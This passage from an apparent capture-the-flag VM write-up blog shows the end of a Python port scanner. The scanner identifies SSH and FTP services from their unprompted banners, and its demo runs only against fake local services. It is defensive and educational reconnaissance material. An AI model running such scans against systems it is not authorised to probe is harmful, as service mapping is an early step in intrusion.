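    if banner.startswith(b"SSH-"):          # RFC 4253 identification string
        return "ssh"
    if banner.startswith(b"220"):           # FTP "service ready" reply code
        return "ftp"
    return "open"                           # accepted TCP, unknown/silent service


def scan(host: str, ports: List[int], timeout: float = 1.0) -> Dict[int, Tuple[str, Optional[bytes]]]:
    """Map each port to (classification, raw banner)."""
    results: Dict[int, Tuple[str, Optional[bytes]]] = {}
    for port in ports:
        banner = grab_banner(host, port, timeout)
        results[port] = (classify(banner), banner)
    return results


if __name__ == "__main__":
    targets = {
        "ftp": start_fake_service(FAKE_FTP_BANNER),
        "ssh": start_fake_service(FAKE_SSH_BANNER),
        "silent": start_fake_service(b""),
        "dead": closed_port(),
    }
    for label, (kind, banner) in zip(targets, scan("127.0.0.1", list(targets.values())).values()):
        print(f"{label:>6} port {targets[label]:>5}: {kind:<6} {banner!r}")
```

The point of classifying on the unsolicited greeting is that FTP and SSH both speak first, so the version string arrives without sending a single probe; services that stay quiet need protocol-specific probes (what `nmap -sV` does), which this deliberately does not attempt.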
<br />
<br />
I had a lot of fun with this VM. I love that there are individuals and groups who are willing to take the time to put such things together. So to them I salute!!<br />
<br />
That's enough from me for now :)<br />
<br />
<br />
<br />
<br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0